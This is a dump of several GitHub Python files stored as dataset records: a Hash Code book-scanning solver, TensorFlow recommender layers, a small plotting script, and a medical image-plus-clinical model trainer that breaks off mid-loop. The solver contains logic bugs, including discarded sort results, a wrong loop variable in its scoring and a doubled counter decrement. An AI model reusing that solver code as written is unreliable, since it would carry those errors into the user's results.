solve(scenario):\n global days_left, library_submissions\n\n \n # Setup Globals\n days_left = scenario.days\n library_submissions = {}\n \n # Preprocess (prune common books & give initial rating)\n\n print(\"Preprocessing...\")\n\n library_scores, _ = preprocess(scenario)\n \n print(\"Finished preprocessing!\")\n\n print(\"Solving...\")\n\n # Sort books\n sorted(scenario.books, key=lambda b: b.score)\n for library in scenario.libraries:\n sorted(library.books, key=lambda b: b.score)\n\n signup_left = -1 # -1 means not signing up, 0 means just finished\n signup_library = None\n\n active_libraries = []\n \n while days_left > 0:\n print(\"Current day: \" + str(days_left))\n if signup_left > 0:\n signup_left -=1\n continue\n elif signup_left == 0:\n # Just finished\n active_libraries.append(signup_library)\n signup_left = -1\n \n library_candidates = list(filter(lambda l: l not in active_libraries, scenario.libraries))\n if len(library_candidates) != 0:\n signup_library = evaluate_for_signup(library_candidates)\n signup_left = signup_library.signup_time\n \n send_books(scenario.libraries)\n\n # Once this has evaluates, a day has passed\n days_left -= 1\n signup_left -= 1\n \n print(\"Solved!\")\n \n # Done solving, output\n generate_output_file(active_libraries)\n \n print(\"Done!\")\n \ndef preprocess(scenario):\n # Steps:\n # 1. Rate each library based on the value of its books\n library_scores = {}\n for library in scenario.libraries:\n score = score_library(library)\n library_scores[library.id] = score\n # 2. 'prune' books from libraries if the book already exists in a higher score library\n best_library_for_book = {}\n i = 0\n for book in scenario.books:\n i += 1\n if i % 500 == 0:\n print(\"Book: \" + str(book.id))\n # Get highest scoring library that contains this book\n best_score = -1\n best_library = None\n for candidate_library in scenario.libraries:\n candidate_score = library_scores[library.id]\n if book in candidate_library.books and best_score < candidate_score:\n best_score = candidate_score\n best_library = candidate_library\n if best_library == None:\n print(\"WARN: Could not find best library for book \" + str(book.id))\n best_library_for_book[book.id] = best_library\n for library in scenario.libraries:\n library.books = list(filter(lambda book: library == best_library_for_book[book.id], library.books))\n # 3. Re-rate each library based on new pruned book contents\n for library in scenario.libraries:\n score = score_library(library)\n library_scores[library.id] = score\n \n print(\"Done preprocessing\")\n\n return library_scores, best_library_for_book\n\ndef evaluate_for_signup(libraries):\n highest_scoring_library = None\n highest_score = -1\n\n for library in libraries:\n score = score_library(library)\n if(score > highest_score):\n highest_score = score\n highest_scoring_library = library\n\n return highest_scoring_library\n\ndef score_library(library): \n global days_left \n shipping_days = days_left - library.signup_time\n \n score = 0\n books_shipped = 0\n days_passed = 0\n \n for book in library.books:\n if days_passed == shipping_days:\n break\n\n books_shipped += 1\n if books_shipped == library.books_per_day:\n days_passed += 1\n \n score += book.score\n \n return score\n\n# Takes list of active libaries and updates daily submissions\ndef send_books(libraries):\n global library_submissions\n print(\"Sending books for libraries...\")\n for library in libraries:\n print(\"Sending books for library: \" + str(library.id))\n #if len(library.books < library.books_per_day):\n # submissions[library.id].extend(library.books)\n # library.books = []\n #else:\n submissions = library_submissions[library.id] if library.id in library_submissions else []\n submissions.extend(library.books[:library.books_per_day])\n print(\"Sent \" + str(len(submissions)) + \" books.\")\n library_submissions[library.id] = submissions\n del library.books[:library.books_per_day]\n print(\"Done sending books.\")\n return\n\n#takes in a list of signed up library objects\ndef generate_output_file(libraries_signed_up):\n global library_submissions\n filename = \"output.txt\"\n print(\"Writing output to '\" + filename + \"'...\")\n with open(filename, \"w\") as handle:\n handle.write(str(len(libraries_signed_up)) + \" \\n\")\n for library in libraries_signed_up:\n handle.write(str(library.id) + \" \" + str(len(library_submissions[library.id])) + \"\\n\")\n handle.write(\" \".join(str(book.id) for book in library_submissions[library.id]) + \"\\n\")\n handle.close()\n print(\"Done writing to file.\")\n\ndef get_file(letter):\n path = \"datasets\"\n names = [f for f in listdir(path) if isfile(join(path, f))]\n for name in names:\n if name.startswith(letter + \"_\"):\n return \"datasets/\" + name\n\nINPUT_FILE = get_file(\"b\")\nWHOSE_WAY = \"RAKA\"\n\nwith open(INPUT_FILE, \"r\") as handle:\n print(\"Parsing file '\" + INPUT_FILE + \"'...\")\n scenario = parse(handle)\n print(\"Done parsing.\")\n print(\"total_books = \" + str(len(scenario.books)))\n print(\"total_libraries = \" + str(len(scenario.libraries)))\n\n if WHOSE_WAY == \"RAKA\":\n preprocess(scenario)\n import gannsolve\n random_nn = gannsolve.NeuralNetwork([4,8,10,4,1])\n gannsolve.gen_output_file(random_nn, scenario)\n else:\n solve(scenario)","repo_name":"curz46/hashcode","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":7434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12992276540","text":"import tensorflow as tf\nfrom tensorflow.python.keras.models import Model\nfrom tensorflow.python.keras.layers import Input, Dense, Layer\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.initializers import truncated_normal, random_normal, glorot_normal, zeros\n\n\nclass SampledSoftmaxLayer(Layer):\n def __init__(self, target_song_size, target_emb_size, num_sampled=2, **kwargs):\n self.num_sampled = num_sampled\n self.target_song_size = target_song_size\n self.target_emb_size = target_emb_size\n super(SampledSoftmaxLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.song_embedding = self.add_weight(shape=[self.target_song_size, self.target_emb_size],\n initializer=truncated_normal(0, 0.1),\n dtype=tf.float32,\n name=\"song_embedding\")\n self.zero_bias = self.add_weight(shape=[self.target_song_size],\n initializer=zeros,\n dtype=tf.float32,\n trainable=False,\n name=\"bias\")\n super(SampledSoftmaxLayer, self).build(input_shape)\n\n def call(self, inputs_with_label_idx, label_idx=None, training=None, **kwargs):\n \"\"\"\n The first input should be the model as it were, and the second the\n target (i.e., a repeat of the training data) to compute the labels\n argument\n\n \"\"\"\n inputs, label_idx = inputs_with_label_idx\n # the labels input to this function is batch size by 1, where the\n # value at position (i, 1) is the index that is true (not zero)\n # e.g., (0, 0, 1) => (2) or (0, 1, 0, 0) => (1)\n return K.nn.sampled_softmax_loss(weights=self.song_embedding,\n biases=self.zero_bias,\n labels=label_idx,\n inputs=inputs,\n num_sampled=self.num_sampled,\n num_classes=self.target_song_size\n )\n\n def get_config(self, ):\n config = {'target_song_size': self.target_song_size, 'num_sampled': self.num_sampled}\n base_config = super(SampledSoftmaxLayer, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n\nclass DotProductAttentionLayer(Layer):\n def __init__(self, shape, scope=\"attention\", mask=True, has_W=True, pow_p=1, **kwargs):\n self.scope = scope\n self.shape = shape\n self.mask = mask\n self.has_W = has_W\n self.pow_p = pow_p\n super(DotProductAttentionLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n # Be sure to call this somewhere!\n self.W = self.add_weight(shape=self.shape,\n initializer=truncated_normal(0, 0.1),\n dtype=tf.float32,\n name=\"W\")\n super(DotProductAttentionLayer, self).build(input_shape)\n\n def call(self, inputs, seq_length=None, max_len=4, get_max=False, out_name=\"out\",\n **kwargs): # key:[B,H,E1], query:[B,E2,1]\n keys, query = inputs\n if self.mask:\n if seq_length is None or max_len is None:\n raise ValueError(\"seq_length and max_len must be provided if use mask\")\n\n if self.has_W:\n weight = tf.transpose(tf.matmul(tf.tensordot(keys, self.W, axes=1), query), [0, 2, 1])\n else:\n weight = tf.transpose(tf.matmul(keys, query), [0, 2, 1])\n\n if self.mask:\n seq_mask = tf.sequence_mask(seq_length, max_len)\n padding = tf.ones_like(seq_mask, dtype=tf.float32) * (-2 ** 16 + 1)\n weight_tmp = tf.where(seq_mask, weight, padding, name=\"weight_tmp\")\n weight = tf.pow(weight_tmp, self.pow_p)\n\n weight = tf.nn.softmax(weight, axis=-1, name=\"weight\") # [B,1,H]\n\n if get_max:\n indices = tf.argmax(weight, -1) # [B,1] ArgMax\n weight = tf.one_hot(indices, max_len) # [B,1,H]\n\n output = tf.reshape(tf.matmul(weight, keys), [-1, keys.get_shape().as_list()[-1]]) # Reshape\n\n return output\n\n def compute_output_shape(self, input_shape):\n # todo\n return None, 8\n\n\nclass CapsuleLayer(Layer):\n def __init__(self, input_units, out_units, max_len, k_max, iteration=3,\n weight_initializer=random_normal(stddev=1.0), **kwargs):\n self.input_units = input_units # E1\n self.out_units = out_units # E2\n self.max_len = max_len\n self.k_max = k_max\n self.iteration = iteration\n self.weight_initializer = weight_initializer\n super(CapsuleLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.B_matrix = self.add_weight(shape=[1, self.k_max, self.max_len], initializer=self.weight_initializer,\n trainable=False, name=\"B\", dtype=tf.float32) # [1,K,H]\n self.S_matrix = self.add_weight(shape=[self.input_units, self.out_units], initializer=self.weight_initializer,\n name=\"S\", dtype=tf.float32)\n super(CapsuleLayer, self).build(input_shape)\n\n def call(self, inputs, **kwargs): # seq_len:[B,1]\n low_capsule, seq_len = inputs\n B = tf.shape(low_capsule)[0]\n seq_len_tile = tf.tile(seq_len, [1, self.k_max]) # [B,K]\n\n for i in range(self.iteration):\n mask = tf.sequence_mask(seq_len_tile, self.max_len) # [B,K,H]\n pad = tf.ones_like(mask, dtype=tf.float32) * (-2 ** 16 + 1) # [B,K,H]\n B_tile = tf.tile(self.B_matrix, [B, 1, 1]) # [B,K,H]\n B_mask = tf.where(mask, B_tile, pad)\n W = tf.nn.softmax(B_mask) # [B,K,H]\n low_capsule_new = tf.tensordot(low_capsule, self.S_matrix, axes=1) # [B,H,E2]\n high_capsule_tmp = tf.matmul(W, low_capsule_new) # [B,K,E2]\n high_capsule = squash(high_capsule_tmp) # [B,K,E2]\n\n # ([B,K,E2], [B,H,E2]->[B,E2,H])->[B,K,H]->[1,K,H]\n B_delta = tf.reduce_sum(\n tf.matmul(high_capsule, tf.transpose(low_capsule_new, perm=[0, 2, 1])),\n axis=0, keep_dims=True\n ) # [1,K,H]\n self.B_matrix.assign_add(B_delta)\n\n return high_capsule\n\n\ndef squash(inputs):\n vec_squared_norm = tf.reduce_sum(tf.square(inputs), axis=-1, keepdims=True)\n scalar_factor = vec_squared_norm / (1 + vec_squared_norm) / tf.sqrt(vec_squared_norm + 1e-9)\n vec_squashed = scalar_factor * inputs # element-wise\n return vec_squashed\n","repo_name":"wangjz1993/MIND","sub_path":"easymatch/layers/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"6"} +{"seq_id":"40442857561","text":"import numpy as f\nfrom matplotlib import pyplot as plt\n\nx = f.arange(1,13)\ny = 1 * x + 1\nplt.title(\"student marks\")\nplt.xlabel(\"name\")\nplt.ylabel(\"marks obtained\")\nplt.plot(x,y)\nplt.show()","repo_name":"prajaktak12/python_programs","sub_path":"matlip.py","file_name":"matlip.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35923057688","text":"# Python Modules\r\nimport numpy as np\r\nimport os\r\nimport time\r\nimport math\r\nfrom sklearn.metrics import roc_auc_score, confusion_matrix, average_precision_score, classification_report\r\n\r\n# Torch Modules\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torchsummary import summary\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torch.utils.data import Dataset, DataLoader\r\n\r\n# Self Modules\r\nfrom lib.utils.general import prepare_input\r\nfrom lib.utils.logger import log\r\nfrom lib.utils.evaluation_metrics import roc_auc_plot # (y_true, y_pred)\r\nfrom lib.Models.clinical_ft_model import clinical_model\r\nfrom lib.Loading.clinical_data_loader import clinical_data\r\nfrom lib.Loading.feedtube_pretrain_clinic import FEEDTUBE\r\n\r\n\r\ndef to_categorical(y, num_classes=None, dtype='float32'):\r\n \"\"\"Converts a class vector (integers) to binary class matrix.\r\n E.g. for use with categorical_crossentropy.\r\n Args:\r\n y: class vector to be converted into a matrix\r\n (integers from 0 to num_classes).\r\n num_classes: total number of classes. If `None`, this would be inferred\r\n as the (largest number in `y`) + 1.\r\n dtype: The data type expected by the input. Default: `'float32'`.\r\n Returns:\r\n A binary matrix representation of the input. The classes axis is placed\r\n last.\r\n Example:\r\n >>> a = tf.keras.utils.to_categorical([0, 1, 2, 3], num_classes=4)\r\n >>> a = tf.constant(a, shape=[4, 4])\r\n >>> print(a)\r\n tf.Tensor(\r\n [[1. 0. 0. 0.]\r\n [0. 1. 0. 0.]\r\n [0. 0. 1. 0.]\r\n [0. 0. 0. 1.]], shape=(4, 4), dtype=float32)\r\n >>> b = tf.constant([.9, .04, .03, .03,\r\n ... .3, .45, .15, .13,\r\n ... .04, .01, .94, .05,\r\n ... .12, .21, .5, .17],\r\n ... shape=[4, 4])\r\n >>> loss = tf.keras.backend.categorical_crossentropy(a, b)\r\n >>> print(np.around(loss, 5))\r\n [0.10536 0.82807 0.1011 1.77196]\r\n >>> loss = tf.keras.backend.categorical_crossentropy(a, a)\r\n >>> print(np.around(loss, 5))\r\n [0. 0. 0. 0.]\r\n Raises:\r\n Value Error: If input contains string value\r\n \"\"\"\r\n y = np.array(y, dtype='int')\r\n input_shape = y.shape\r\n if input_shape and input_shape[-1] == 1 and len(input_shape) > 1:\r\n input_shape = tuple(input_shape[:-1])\r\n y = y.ravel()\r\n if not num_classes:\r\n num_classes = np.max(y) + 1\r\n n = y.shape[0]\r\n categorical = np.zeros((n, num_classes), dtype=dtype)\r\n categorical[np.arange(n), y] = 1\r\n output_shape = input_shape + (num_classes,)\r\n categorical = np.reshape(categorical, output_shape)\r\n return categorical\r\n\r\n\r\ndef calculate_accuracy(outputs, targets):\r\n with torch.no_grad():\r\n batch_size = targets.size(0)\r\n\r\n _, pred = outputs.topk(1, 1, largest=True, sorted=True)\r\n pred = pred.t()\r\n correct = pred.eq(targets.view(1, -1))\r\n n_correct_elems = correct.float().sum().item()\r\n\r\n return n_correct_elems / batch_size\r\n\r\n\r\ndef dr_friendly_measures(outputs, targets):\r\n with torch.no_grad():\r\n outputs = torch.argmax(torch.sigmoid(outputs), dim=1)\r\n\r\n try:\r\n tn, fp, fn, tp = confusion_matrix(targets.cpu().numpy(), outputs.cpu().numpy()).ravel()\r\n specificity = tn / (tn + fp + 1e-12)\r\n sensitivity = tp / (tp + fn + 1e-12)\r\n return specificity, sensitivity\r\n except:\r\n return np.nan, np.nan\r\n\r\n\r\ndef sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n\r\ndef dr_friendly_measures_reg(outputs, targets):\r\n # outputs = np.argmax(sigmoid(outputs))\r\n\r\n assert np.shape(outputs) == np.shape(targets), 'prediction and target outcomes should be same shape'\r\n\r\n try:\r\n tn, fp, fn, tp = confusion_matrix(targets, outputs).ravel()\r\n specificity = tn / (tn + fp)\r\n sensitivity = tp / (tp + fn)\r\n return specificity, sensitivity\r\n except:\r\n return np.nan, np.nan\r\n\r\n\r\ndef calculate_auc(outputs, targets):\r\n with torch.no_grad():\r\n outputs = torch.sigmoid(outputs)\r\n try:\r\n auc = roc_auc_score(targets.cpu().numpy(), outputs.type(torch.FloatTensor).cpu().data.numpy()[:, 1])\r\n return auc\r\n except:\r\n return np.nan\r\n\r\n\r\ndef calculate_prauc(outputs, targets):\r\n with torch.no_grad():\r\n outputs = torch.sigmoid(outputs)\r\n try:\r\n prauc = average_precision_score(targets.cpu().numpy(),\r\n outputs.type(torch.FloatTensor).cpu().data.numpy()[:, 1])\r\n return prauc\r\n except:\r\n return np.nan\r\n\r\n\r\nclass Trainer:\r\n \"\"\"\r\n Trainer class\r\n \"\"\"\r\n\r\n def __init__(self, args, model, criterion_pre, optimizer, train_data_loader,\r\n valid_data_loader=None, test_data_loader=None, lr_scheduler=None, tb_logger=None):\r\n\r\n self.args = args\r\n self.model = model\r\n self.optimizer = optimizer\r\n self.criterion_pre = criterion_pre\r\n self.train_data_loader = train_data_loader\r\n self.len_epoch = len(self.train_data_loader)\r\n self.valid_data_loader = valid_data_loader\r\n self.do_validation = self.valid_data_loader is not None\r\n self.test_data_loader = test_data_loader\r\n self.do_test = self.test_data_loader is not None\r\n self.lr_scheduler = lr_scheduler\r\n\r\n self.save_frequency = 20\r\n self.start_epoch = 1\r\n self.val_loss = 0\r\n\r\n self.print_batch_spacing = 50\r\n self.save_interval = args.save_intervals\r\n self.tb_logger = tb_logger\r\n self.train_count = 0\r\n self.val_count = 0\r\n\r\n def training(self):\r\n\r\n for epoch in range(self.start_epoch, (self.args.n_epochs + 1)):\r\n\r\n for param_group in self.optimizer.param_groups:\r\n lr_show = param_group['lr']\r\n log.info('\\n########################################################################')\r\n log.info(f\"Training epoch: {epoch}, Learning rate: {lr_show:.8f}\")\r\n\r\n self.train_epoch_alex(epoch)\r\n\r\n if self.do_validation:\r\n log.info(f\"Validation epoch: {epoch}\")\r\n self.validate_epoch_alex(epoch)\r\n\r\n if self.lr_scheduler is not None:\r\n self.lr_scheduler.step()\r\n\r\n # # comment out for speed test\r\n # if epoch % self.save_frequency == 0:\r\n # self.model.save_checkpoint(self.args.save,\r\n # epoch, self.val_loss,\r\n # optimizer=self.optimizer)\r\n\r\n print('\\n\\n')\r\n\r\n ###WILL NEED TO TRAIN CLINICAL MODEL HERE###\r\n log.info('loading clinical data')\r\n x_train_clinic, y_train_clinic = \\\r\n clinical_data(args=self.args,\r\n train_mrn_list=self.args.train_mrn_list).load_train_data_batch(\r\n batch_size=len(self.args.train_mrn_list))\r\n # log.info('train data: ', np.shape(x_train_clinic))\r\n\r\n x_val_clinic, y_val_clinic = \\\r\n clinical_data(args=self.args,\r\n val_mrn_list=self.args.val_mrn_list,\r\n train_mrn_list=self.args.train_mrn_list).load_val_data_batch(\r\n batch_size=len(self.args.val_mrn_list))\r\n\r\n # log.info('val data: ', np.shape(x_val_clinic))\r\n\r\n x_test_clinic, y_test_clinic = \\\r\n clinical_data(args=self.args,\r\n train_mrn_list=self.args.train_mrn_list,\r\n test_mrn_list=self.args.test_mrn_list).load_test_data_batch(\r\n batch_size=len(self.args.test_mrn_list))\r\n\r\n\r\n clinical_model_ = clinical_model(args=self.args, X=x_train_clinic, y=y_train_clinic,\r\n model_type=self.args.clinical_model_type).create_model()\r\n\r\n y_pred_val_clinic = clinical_model_.predict_proba(x_val_clinic)\r\n y_pred_train_clinic = clinical_model_.predict_proba(x_train_clinic)\r\n y_pred_test_clinic = clinical_model_.predict_proba(x_test_clinic)\r\n\r\n log.info('predictions made')\r\n\r\n # Creating list to store prediction information from image and clinic based model\r\n auc_store = []\r\n auc_store_clinic = []\r\n\r\n rand_num_cv = np.random.randint(0, 1000)\r\n\r\n ### ASSESSING CLINICAL MODEL ###\r\n print('\\nVALIDATION INFORMATION - CLINICAL BASED MODEL\\n')\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report(np.argmax(y_val_clinic, axis=-1),\r\n np.argmax(y_pred_val_clinic, axis=-1),\r\n target_names=target_names))\r\n\r\n print('\\nTRAIN INFORMATION - CLINIC BASED MODEL\\n')\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report(np.argmax(y_train_clinic, axis=-1),\r\n np.argmax(y_pred_train_clinic, axis=-1),\r\n target_names=target_names))\r\n\r\n print('\\nTEST INFORMATION - CLINIC BASED MODEL\\n')\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report(np.argmax(y_test_clinic, axis=-1),\r\n np.argmax(y_pred_test_clinic, axis=-1),\r\n target_names=target_names))\r\n\r\n # Clinical model evaluation that will be saved to tensorboard\r\n # Validation results\r\n fig_add = roc_auc_plot(y_val_clinic, y_pred_val_clinic, data_title=f\"Clinical Model Val AUC\")\r\n self.tb_logger.add_figure(f\"Clinical Model Validation AUC\", figure=fig_add)\r\n clinic_spec, clinic_sens = dr_friendly_measures_reg(np.argmax(y_pred_val_clinic, axis=-1), np.argmax(y_val_clinic, axis=-1))\r\n print('sensitivity: ', clinic_sens, 'specificity: ', clinic_spec)\r\n\r\n self.tb_logger.add_scalar(f\"clinic_model_val_spec\", clinic_spec, 0)\r\n self.tb_logger.add_scalar(f\"clinic_model_val_sens\", clinic_sens, 0)\r\n self.tb_logger.flush()\r\n\r\n # AUC values gathered for total prediction model\r\n auc_ = roc_auc_score(y_true=np.argmax(y_val_clinic, axis=-1), y_score=y_pred_val_clinic[:, 1])\r\n print('clinical model auc_: ', auc_)\r\n auc_store_clinic.append(auc_)\r\n\r\n # Train results\r\n fig_add = roc_auc_plot(y_train_clinic, y_pred_train_clinic, data_title=f\"Clinical Model Train AUC\")\r\n self.tb_logger.add_figure(f\"Clinical Model Train AUC\", figure=fig_add)\r\n clinic_spec, clinic_sens = dr_friendly_measures_reg(np.argmax(y_pred_train_clinic, axis=-1),\r\n np.argmax(y_train_clinic, axis=-1))\r\n\r\n self.tb_logger.add_scalar(f\"clinic_model_train_spec\", clinic_spec, 0)\r\n self.tb_logger.add_scalar(f\"clinic_model_train_sens\", clinic_sens, 0)\r\n self.tb_logger.flush()\r\n\r\n # Test results\r\n fig_add = roc_auc_plot(y_test_clinic, y_pred_test_clinic, data_title=f\"Clinical Model Test AUC\")\r\n self.tb_logger.add_figure(f\"Clinical Model Test AUC\", figure=fig_add)\r\n clinic_spec, clinic_sens = dr_friendly_measures_reg(np.argmax(y_pred_test_clinic, axis=-1),\r\n np.argmax(y_test_clinic, axis=-1))\r\n\r\n self.tb_logger.add_scalar(f\"clinic_model_test_spec\", clinic_spec, 0)\r\n self.tb_logger.add_scalar(f\"clinic_model_test_sens\", clinic_sens, 0)\r\n self.tb_logger.flush()\r\n\r\n ### FINISHED ASSESSING CLINICAL MODEL ###\r\n\r\n ### ASSESSING IMAGE MODEL ###\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n # creating PR curve training/validation\r\n for batch_idx, input_tuple in enumerate(self.train_data_loader):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n log.info(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n fig_add = roc_auc_plot(target2_, pred2_, data_title='Training ROC')\r\n self.tb_logger.add_figure(f\"Image Model Train AUC\", figure=fig_add)\r\n\r\n target_ = torch.from_numpy(np.array(target_).astype('int32'))\r\n pred_ = torch.from_numpy(np.array(pred_).astype('int32'))\r\n\r\n self.tb_logger.add_pr_curve(f\"Image Model Training PR Curve\", target_, pred_)\r\n self.tb_logger.flush()\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n for batch_idx, input_tuple in enumerate(self.valid_data_loader):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n fig_add = roc_auc_plot(target2_, pred2_, data_title='Validation ROC')\r\n self.tb_logger.add_figure(f\"Image Model Validation AUC\", figure=fig_add)\r\n\r\n # AUC values gathered for total prediction model\r\n auc_ = roc_auc_score(y_true=np.argmax(target2_, axis=-1), y_score=pred2_[:, 1])\r\n auc_store.append(auc_)\r\n\r\n target_ = torch.from_numpy(np.array(target_).astype('int32'))\r\n pred_ = torch.from_numpy(np.array(pred_).astype('int32'))\r\n\r\n self.tb_logger.add_pr_curve(f\"Image Model Validation PR Curve\", target_, pred_)\r\n self.tb_logger.flush()\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n # Testing\r\n for batch_idx, input_tuple in enumerate(self.test_data_loader):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n fig_add = roc_auc_plot(target2_, pred2_, data_title='Test ROC')\r\n self.tb_logger.add_figure(f\"Image Model Test AUC\", figure=fig_add)\r\n\r\n target_ = torch.from_numpy(np.array(target_).astype('int32'))\r\n pred_ = torch.from_numpy(np.array(pred_).astype('int32'))\r\n\r\n self.tb_logger.add_pr_curve(f\"Image Model Test PR Curve\", target_, pred_)\r\n self.tb_logger.flush()\r\n\r\n ### FINISHED ASSESSING IMAGE MODEL ###\r\n\r\n ### ASSESSING IMAGE + CLINIC MODEL ###\r\n\r\n # image factor / (image factor + clinic factor)\r\n alpha_image = auc_store[0] / (auc_store[0] + auc_store_clinic[0])\r\n\r\n # Creating new validation and testing generators for validation\r\n # VALIDATION\r\n validation_dataset_eval = FEEDTUBE(self.args, mode='val',\r\n train_path=self.args.train_dataset_path,\r\n val_path=self.args.val_dataset_path,\r\n test_path=self.args.test_dataset_path,\r\n # dataset_path=args.train_dataset_path,\r\n label_path=self.args.val_label_path,\r\n exclude_mrns=self.args.exclude_mrns,\r\n clinic_image_eval=True)\r\n val_generator_eval = DataLoader(validation_dataset_eval, batch_size=1, shuffle=False, num_workers=0)\r\n\r\n # TESTING\r\n test_dataset_eval = FEEDTUBE(self.args, mode='test',\r\n train_path=self.args.train_dataset_path,\r\n val_path=self.args.val_dataset_path,\r\n test_path=self.args.test_dataset_path,\r\n # dataset_path=args.train_dataset_path,\r\n label_path=self.args.test_label_path,\r\n exclude_mrns=self.args.exclude_mrns,\r\n clinic_image_eval=True)\r\n test_generator_eval = DataLoader(test_dataset_eval, batch_size=1, shuffle=False, num_workers=0)\r\n\r\n # Evaluating image and clinic model performance on validation data\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n target2_c = []\r\n pred2_c = []\r\n\r\n for batch_idx, input_tuple in enumerate(val_generator_eval):\r\n with torch.no_grad():\r\n # Gathering input data; prepare_input sends to gpu\r\n mrn = list(input_tuple[2])\r\n # print(mrn_str)\r\n input_tuple = input_tuple[0:2]\r\n # print(input_tuple)\r\n input_tensor, target = prepare_input(input_tuple=input_tuple, args=self.args)\r\n\r\n # Model make prediction\r\n pred = self.model(input_tensor)\r\n pred_.extend(torch.argmax(torch.sigmoid(pred), dim=1).cpu().numpy())\r\n pred2_.extend(np.array(torch.sigmoid(pred).cpu().numpy()).tolist())\r\n\r\n target_.extend(target.cpu().numpy())\r\n target2_.extend(np.array(F.one_hot(target).cpu().numpy()).tolist())\r\n\r\n x_val_clinic, y_val_clinic = \\\r\n clinical_data(args=self.args,\r\n val_mrn_list=mrn,\r\n train_mrn_list=self.args.train_mrn_list).load_val_data_batch(batch_size=1)\r\n\r\n y_pred_val_clinic = clinical_model_.predict_proba(x_val_clinic)\r\n target2_c.extend(y_val_clinic)\r\n pred2_c.extend(np.array(y_pred_val_clinic).tolist())\r\n\r\n target2_ = np.array(target2_)\r\n pred2_ = np.array(pred2_)\r\n\r\n pred2_c_1 = [x[1] for x in pred2_c]\r\n\r\n ### Evaluating loaded data above (Validation, Train, Test)\r\n # printing precision, recall, and fscore for each class for validation data\r\n print('\\nVALIDATION INFORMATION - IMAGE/CLINIC BASED MODEL\\n')\r\n\r\n pred2_[:, 0] = np.add(np.dot(1 - pred2_[:, 1], alpha_image),\r\n np.dot([1 - x for x in pred2_c_1], (1 - alpha_image)))\r\n\r\n pred2_[:, 1] = np.add(np.dot(pred2_[:, 1], alpha_image),\r\n np.dot(pred2_c_1, (1 - alpha_image)))\r\n\r\n assert [np.argmax(np.array(x).tolist()) for x in target2_] == [np.argmax(x) for x in np.array(target2_c)]\r\n\r\n print('COMBINED IMAGE AND CLINIC MODEL - VALIDATION DATA')\r\n\r\n target_names = ['class ' + str(x) for x in range(self.args.n_classes)]\r\n print('\\n', classification_report([np.argmax(np.array(x).tolist()) for x in target2_],\r\n np.argmax(pred2_, axis=-1),\r\n target_names=target_names))\r\n\r\n # PRED2_ HAS BEEN UPDATED IN THE CODE ABOVE AND REPRESENTS PREDICTION SCORE OF IMAGE AND CLINIC COMBINED\r\n fig_add = roc_auc_plot(\r\n np.array([to_categorical(np.argmax(np.array(x)), self.args.n_classes).tolist() for x in target2_]),\r\n # target2_c,\r\n pred2_,\r\n data_title='Validation Image/Clinic ROC')\r\n self.tb_logger.add_figure(f\"Validation_ROC_Image_Clinic\", figure=fig_add)\r\n\r\n # print(np.array([np.argmax(np.array(x)).tolist() for x in target2_]))\r\n\r\n auc_ = roc_auc_score(\r\n y_true=np.array([np.argmax(np.array(x)).tolist() for x in target2_]),\r\n y_score=pred2_[:, 1])\r\n print('combine image and clinic validation auc: ', auc_)\r\n\r\n # Evaluating image and clinic model performance on TEST data\r\n\r\n target_ = []\r\n pred_ = []\r\n target2_ = []\r\n pred2_ = []\r\n\r\n target2_c = []\r\n pred2_c = []\r\n\r\n for batch_idx, 